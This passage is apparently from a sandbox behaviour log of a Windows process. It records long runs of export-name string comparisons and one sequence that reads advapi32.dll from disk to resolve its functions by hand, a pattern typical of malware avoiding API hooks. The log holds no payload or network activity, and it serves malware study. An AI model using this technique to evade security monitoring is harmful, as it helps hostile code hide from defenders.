(lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0177.063] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0177.064] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.064] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0177.065] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0177.066] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0177.066] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0177.066] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0177.066] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0177.066] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0177.194] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0177.195] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0177.195] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0177.195] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0177.195] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.195] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0177.195] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.195] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0177.195] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0177.196] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0177.206] GetProcessHeap () returned 0x590000 [0177.207] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40cc040 | out: hHeap=0x590000) returned 1 [0177.217] GetProcessHeap () returned 0x590000 [0177.217] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a90a0 [0177.218] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0177.218] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0177.219] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0177.219] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0177.219] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0177.219] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0177.219] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0177.219] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0177.220] GetProcessHeap () returned 0x590000 [0177.220] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa3ef0) returned 0x2d02010 [0177.221] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0177.221] ReadFile (in: hFile=0x140, lpBuffer=0x2d02010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d02010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0177.369] CloseHandle (hObject=0x140) returned 1 [0177.369] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0177.369] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0177.369] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0177.370] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0177.370] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0177.370] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0177.370] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0177.370] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0177.370] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0177.370] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.370] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0177.371] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0177.372] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0177.373] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0177.374] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0177.374] 